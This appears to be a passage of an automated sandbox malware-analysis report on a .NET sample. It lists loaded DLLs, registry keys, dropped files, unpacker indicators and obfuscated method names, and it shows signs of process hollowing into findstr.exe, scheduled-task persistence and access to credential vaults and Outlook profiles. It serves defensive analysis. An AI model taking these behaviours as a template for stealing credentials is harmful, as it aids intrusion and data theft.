Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe	Section loaded: wininet.dll
Source: C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe	Section loaded: mswsock.dll
Source: C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe	Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe	Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe	Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe	Section loaded: rasadhlp.dll

Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\SysWOW64\findstr.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: 8SxJ9aYfJ1.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: 8SxJ9aYfJ1.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: findstr.pdbGCTL source: 8SxJ9aYfJ1.exe, 0000000A.00000002.2392198546.00000000011A8000.00000004.00000020.00020000.00000000.sdmp, TwkYThKVQVaYn.exe, 0000000F.00000002.2567891581.0000000000CF7000.00000004.00000020.00020000.00000000.sdmp, sbJGUdSMCgtLQJ.exe, 00000011.00000002.4527947703.00000000011C8000.00000004.00000020.00020000.00000000.sdmp, sbJGUdSMCgtLQJ.exe, 00000013.00000002.4528354654.0000000001238000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: sbJGUdSMCgtLQJ.exe, 00000011.00000002.4523958138.000000000016E000.00000002.00000001.01000000.0000000D.sdmp, sbJGUdSMCgtLQJ.exe, 00000013.00000002.4524029986.000000000016E000.00000002.00000001.01000000.0000000D.sdmp, sbJGUdSMCgtLQJ.exe, 00000017.00000002.4523960013.000000000016E000.00000002.00000001.01000000.0000000D.sdmp
Source:	Binary string: wntdll.pdbUGP source: 8SxJ9aYfJ1.exe, 0000000A.00000002.2392690731.0000000001600000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, 00000012.00000002.4530621249.00000000036AE000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, 00000012.00000003.2392246539.00000000031B5000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000012.00000003.2398513253.0000000003362000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000012.00000002.4530621249.0000000003510000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, 00000015.00000003.2574871339.000000000376D000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000015.00000002.2641687151.0000000003ABE000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, 00000015.00000003.2568189800.00000000035B3000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000015.00000002.2641687151.0000000003920000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: findstr.pdb source: 8SxJ9aYfJ1.exe, 0000000A.00000002.2392198546.00000000011A8000.00000004.00000020.00020000.00000000.sdmp, TwkYThKVQVaYn.exe, 0000000F.00000002.2567891581.0000000000CF7000.00000004.00000020.00020000.00000000.sdmp, sbJGUdSMCgtLQJ.exe, 00000011.00000002.4527947703.00000000011C8000.00000004.00000020.00020000.00000000.sdmp, sbJGUdSMCgtLQJ.exe, 00000013.00000002.4528354654.0000000001238000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: 8SxJ9aYfJ1.exe, 8SxJ9aYfJ1.exe, 0000000A.00000002.2392690731.0000000001600000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, 00000012.00000002.4530621249.00000000036AE000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, 00000012.00000003.2392246539.00000000031B5000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000012.00000003.2398513253.0000000003362000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000012.00000002.4530621249.0000000003510000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, 00000015.00000003.2574871339.000000000376D000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000015.00000002.2641687151.0000000003ABE000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, 00000015.00000003.2568189800.00000000035B3000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000015.00000002.2641687151.0000000003920000.00000040.00001000.00020000.00000000.sdmp

Data Obfuscation

.NET source code contains potential unpacker

Source: 0.2.8SxJ9aYfJ1.exe.27d6070.0.raw.unpack, -.cs	.Net Code: _0001 System.Reflection.Assembly.Load(byte[])
Source: 0.2.8SxJ9aYfJ1.exe.27d6070.0.raw.unpack, PingPong.cs	.Net Code: Justy
Source: 0.2.8SxJ9aYfJ1.exe.3bb87b0.2.raw.unpack, t2UsJXWPf4QR3Q12Gr.cs	.Net Code: MNCwKDaZ0Oc2iP7Tcx7 System.Reflection.Assembly.Load(byte[])
Source: 0.2.8SxJ9aYfJ1.exe.3b30d90.1.raw.unpack, t2UsJXWPf4QR3Q12Gr.cs	.Net Code: MNCwKDaZ0Oc2iP7Tcx7 System.Reflection.Assembly.Load(byte[])
Source: 0.2.8SxJ9aYfJ1.exe.7790000.5.raw.unpack, -.cs	.Net Code: _0001 System.Reflection.Assembly.Load(byte[])
Source: 0.2.8SxJ9aYfJ1.exe.7790000.5.raw.unpack, PingPong.cs	.Net Code: Justy
Source: 0.2.8SxJ9aYfJ1.exe.69c0000.4.raw.unpack, t2UsJXWPf4QR3Q12Gr.cs	.Net Code: MNCwKDaZ0Oc2iP7Tcx7 System.Reflection.Assembly.Load(byte[])
Source: 11.2.TwkYThKVQVaYn.exe.28a5cc0.0.raw.unpack, -.cs	.Net Code: _0001 System.Reflection.Assembly.Load(byte[])
Source: 11.2.TwkYThKVQVaYn.exe.28a5cc0.0.raw.unpack, PingPong.cs	.Net Code: Justy

Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 0_2_025EF150 push esi; retf	0_2_025EF15A
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 0_2_025EF16B push esp; retf	0_2_025EF17A
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 0_2_025EF162 push edi; retf	0_2_025EF16A
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 0_2_025EFD43 push edx; retf	0_2_025EFD46
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 0_2_025EFDE8 push ebx; retf	0_2_025EFDEE
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 0_2_06A7C209 push esp; retf	0_2_06A7C216
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 0_2_06A7C170 push esp; retf	0_2_06A7C17E
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 0_2_073E10F0 pushad ; retf	0_2_073E10FE
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_00401856 push eax; iretd	10_2_0040185B
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_0040C0A8 push C92FFB7Fh; iretd	10_2_0040C0AD
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_0041F1BF push ds; iretd	10_2_0041F1CE
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_0040D2CE push 0000007Bh; iretd	10_2_0040D2D7
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_00413AA3 push esi; iretd	10_2_00413AEB
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_00413AA5 push esi; iretd	10_2_00413AEB
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_00403370 push eax; ret	10_2_00403372
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_004015A0 push eax; retn B5B8h	10_2_00401612
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_004147FB push es; ret	10_2_0041485E
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_0160225F pushad ; ret	10_2_016027F9
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016027FA pushad ; ret	10_2_016027F9
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016309AD push ecx; mov dword ptr [esp], ecx	10_2_016309B6
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_0160283D push eax; iretd	10_2_01602858
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01601328 push eax; iretd	10_2_01601369
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01609939 push es; iretd	10_2_01609940
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Code function: 15_2_011CC54D pushfd ; ret	15_2_011CC54E
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Code function: 15_2_011CC54F push 8B011567h; ret	15_2_011CC554
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Code function: 15_2_011809AD push ecx; mov dword ptr [esp], ecx	15_2_011809B6
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Code function: 15_2_011CC9D7 push edi; ret	15_2_011CC9D9
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Code function: 15_2_01151368 push eax; iretd	15_2_01151369
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Code function: 15_2_01151FEC push eax; iretd	15_2_01151FED
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Code function: 15_2_011D7E99 push ecx; ret	15_2_011D7EAC

Source: 8SxJ9aYfJ1.exe	Static PE information: section name: .text entropy: 7.936528755801335
Source: TwkYThKVQVaYn.exe.0.dr	Static PE information: section name: .text entropy: 7.936528755801335

Source: 0.2.8SxJ9aYfJ1.exe.3bb87b0.2.raw.unpack, Y2IHfS803OE2xeLpjv.cs	High entropy of concatenated method names: 'YeQdtxE2t2', 'hWXdbeSlo8', 'Qj2d9Ujg3C', 'Ld4dlBMka9', 'pHedDAE8uW', 'E6Wd6QXFqY', 'umpd4oItsL', 'w3vdP0rbGo', 'R4ydphrKV6', 'mKCd7nLgF8'
Source: 0.2.8SxJ9aYfJ1.exe.3bb87b0.2.raw.unpack, J9RVJ6K99W0MlJv4fW.cs	High entropy of concatenated method names: 'jS9r9Z9ISO', 'jsHrlETR2h', 'DYXruMFV5P', 'cN4rL4cjPd', 'kbMr0APsnt', 'D7PrMWEGqJ', 'n81rAQ5oLx', 'uFrrWKwNON', 'b28rZDn4VH', 'bClr2jo0iL'
Source: 0.2.8SxJ9aYfJ1.exe.3bb87b0.2.raw.unpack, t2UsJXWPf4QR3Q12Gr.cs	High entropy of concatenated method names: 'tRgJQAW6LH', 'CYiJEmYNpq', 'LSjJrVg39P', 'PX8JIT64Vq', 'hWtJx71YeE', 'eQrJBoebDy', 'M1JJGQy3kq', 'QKWJFbePNP', 'hWrJ8polrn', 'yQtJotW3ia'
Source: 0.2.8SxJ9aYfJ1.exe.3bb87b0.2.raw.unpack, sElARX1fmIIkSrG6t6J.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'FXhV9c00cY', 'gnIVlYg25m', 'dYMVuwau9n', 'libVLk2tF6', 'BDtV0nMQx8', 'VnVVMWCgsi', 'SKrVAd1luZ'
Source: 0.2.8SxJ9aYfJ1.exe.3bb87b0.2.raw.unpack, zVHbFNYULAGJFspyUV.cs	High entropy of concatenated method names: 'Dispose', 'xwWyZkFTYk', 'BcveD7AmEK', 'EcCkkoyaNp', 'QbQy25AbHh', 'DSMyzdPt5t', 'ProcessDialogKey', 'fmoesPkgaX', 'QSyeyCsWsM', 'vDMeePfuKN'
Source: 0.2.8SxJ9aYfJ1.exe.3bb87b0.2.raw.unpack, wB2Rr9wfkSfia2CgoH.cs	High entropy of concatenated method names: 'ToString', 'Qd1jnyVS0c', 'aFQjDsnj9K', 'iZMj6wKEQT', 'oYUj4FhalN', 'MeOjPfMKXD', 'B2Njpmhvli', 'C5rj7n6r4E', 'QZCjNnMo6a', 'TXgjiIkgOh'
Source: 0.2.8SxJ9aYfJ1.exe.3bb87b0.2.raw.unpack, rFvtaNchkTr3nMUUIn.cs	High entropy of concatenated method names: 'KERvElHXvk', 'j85vr8spPH', 'QBnvIsbgHJ', 'luNvx1nNSf', 'VHrvB6QqE1', 'fLEvGOfOc1', 'jXWvFqcFEM', 'JTuv8fGcDw', 'TSevoLFeXH', 'EwNvmmpiWt'
Source: 0.2.8SxJ9aYfJ1.exe.3bb87b0.2.raw.unpack, jb1pfZdktLu52my0oO.cs	High entropy of concatenated method names: 'BGqGR4pA17', 'ugsGgPaAd2', 'fQqGcKCUil', 's6rGh4OBPZ', 'W9lGUf05gt', 'qs6GKU6EWE', 'wNfGq2CipJ', 'Vk8GOf8S8m', 'kKQGCSdivA', 'EbDGSqdj6Z'
Source: 0.2.8SxJ9aYfJ1.exe.3bb87b0.2.raw.unpack, HiQ4I43Uvsow4nTqbt.cs	High entropy of concatenated method names: 'OU9XOXY5Dx', 'IV9XCaK0Ey', 'sKhXwG6MoY', 'OJIXDhpOox', 'W9iX4GvKiZ', 'eSwXPPjSB6', 'DSSX7tXjoI', 'ctOXNQiHAK', 'AGCXtPos8F', 'lkCXnr1ycn'
Source: 0.2.8SxJ9aYfJ1.exe.3bb87b0.2.raw.unpack, RWpFebSe4HVyqtjbec.cs	High entropy of concatenated method names: 'Qdq1W2G1bx', 'jor12ZaWoA', 'L7yvscNQop', 'q1SvymZTIh', 'gGT1naWDmk', 'Oel1bIxkko', 'tMQ1To0fRY', 'nv419WSKNZ', 'Cjl1lLSgjc', 'nLF1umybL0'
Source: 0.2.8SxJ9aYfJ1.exe.3bb87b0.2.raw.unpack, Q10DCOH47cMss7Ao3T.cs	High entropy of concatenated method names: 'JiQxUXpVLr', 'xjmxqgy0iM', 'LfxI6eLQYh', 'cZpI4jq72a', 's62IP0bXZE', 'yisIp8sM0T', 'rJ6I77pcbv', 'xXiINbL72T', 'z8JIiUTtM4', 'XMiItJYdSb'
Source: 0.2.8SxJ9aYfJ1.exe.3bb87b0.2.raw.unpack, I1OuxervgZa6PWoI0E.cs	High entropy of concatenated method names: 'Ka91o918Nt', 'MgE1mki3qj', 'ToString', 'mAf1Ea6lIf', 'Oyl1ruwv0f', 'vn51ITOTVy', 'Fyc1xMSPJj', 'wC61Byax2W', 'Kdb1GSgbRQ', 'Uwm1FJ5kTj'
Source: 0.2.8SxJ9aYfJ1.exe.3bb87b0.2.raw.unpack, rJYWQ2oBq7Yb7jo00a.cs	High entropy of concatenated method names: 'iUr3ymljsGvvs9LHLHS', 'mqNnf1lfICqTTyJYKbR', 'LBeBv08Tr2', 'ud3BfgAkiE', 'TaMBVqKGoZ', 'xNDbFBlVwinT3RARj6r', 'Q1wPMklYGoPxIKlkyWV'
Source: 0.2.8SxJ9aYfJ1.exe.3bb87b0.2.raw.unpack, jaQqi6JmmnmdPZuwgH.cs	High entropy of concatenated method names: 'fjWGEmImNo', 'fWHGIenf9e', 'wvuGBsPFkI', 'jBAB20wcUo', 'hOFBz0kuYF', 'IOKGsAvvvu', 'fX0GyTMijv', 'bQwGergg72', 'kIdGJrEvCK', 'sJMGaJgEdI'
Source: 0.2.8SxJ9aYfJ1.exe.3bb87b0.2.raw.unpack, X7Ye7Th1idJlwDwrpj.cs	High entropy of concatenated method names: 'jUJIh2J5h2', 'VfSIKiga3Q', 'yFqIOZm1Pi', 'RtRIC1jco2', 'SoBIdLLdEI', 'WrEIjU7o8N', 'L3xI1G3PVy', 'SKZIvbSOwq', 'kHGIfsIs7x', 'xDJIV6tV0g'
Source: 0.2.8SxJ9aYfJ1.exe.3bb87b0.2.raw.unpack, ElqWMNNuTTe5PkiWTf.cs	High entropy of concatenated method names: 'smkyG8xcGP', 'W9oyFPGCWB', 'lPqyo4q7NS', 'CnCymvmMWE', 'U66ydQBKuo', 'Ypxyjywwfx', 'ttliZk5LyBm7C9lKLm', 'cpPnWDbOKiLPDO7VxF', 'IcfaoDHeY0TKAt2e12', 'eDtyy0wSC8'
Source: 0.2.8SxJ9aYfJ1.exe.3bb87b0.2.raw.unpack, zvgrFmt1aRxW8NM3X7.cs	High entropy of concatenated method names: 'JBQfy7trsc', 'cnLfJqUEQ1', 'UodfaTtSq8', 'w6MfE89Gwf', 'EjXfrWbaR5', 't17fxJQjpc', 'pXsfBy3xcy', 'f2QvAMGuXZ', 'xPOvWGGxX9', 'GmwvZZ0QkU'
Source: 0.2.8SxJ9aYfJ1.exe.3bb87b0.2.raw.unpack, mTwLB111SFPqglkQENw.cs	High entropy of concatenated method names: 'ToString', 'jXkVJ8JiZT', 'dg3Vae3KeC', 'zv4VQsXNJr', 'jMcVE4r8mQ', 'OX5Vr7L7gm', 'lOTVIg2LRK', 'r0YVxqKVgD', 'fIog4uhmLK0rlfqkfMQ', 'M6OUNghzwPhFYGsAnpu'
Source: 0.2.8SxJ9aYfJ1.exe.3bb87b0.2.raw.unpack, WITcdq0YQjaZA5NFwT.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'XcfeZESwgH', 'frme2MTbLk', 'elxezqt15O', 'q69JsUw0IM', 'zNaJyrKtUC', 'WmZJeoq9vo', 'sGtJJl7nWd', 'ihRrmiaaYXIDL0hJtlZ'
Source: 0.2.8SxJ9aYfJ1.exe.3bb87b0.2.raw.unpack, tAMspT1Z90pZnDTmvOH.cs	High entropy of concatenated method names: 'QxSfRkNuZq', 'cu6fgOnGqk', 'UuTfcJclSt', 'g9xfhtXmcp', 'eDhfUAnHyp', 'NarfKZm7jr', 'fT8fqYEVvv', 'xNAfOYqIdl', 'D5NfCRjij9', 'ROmfSvf5y3'
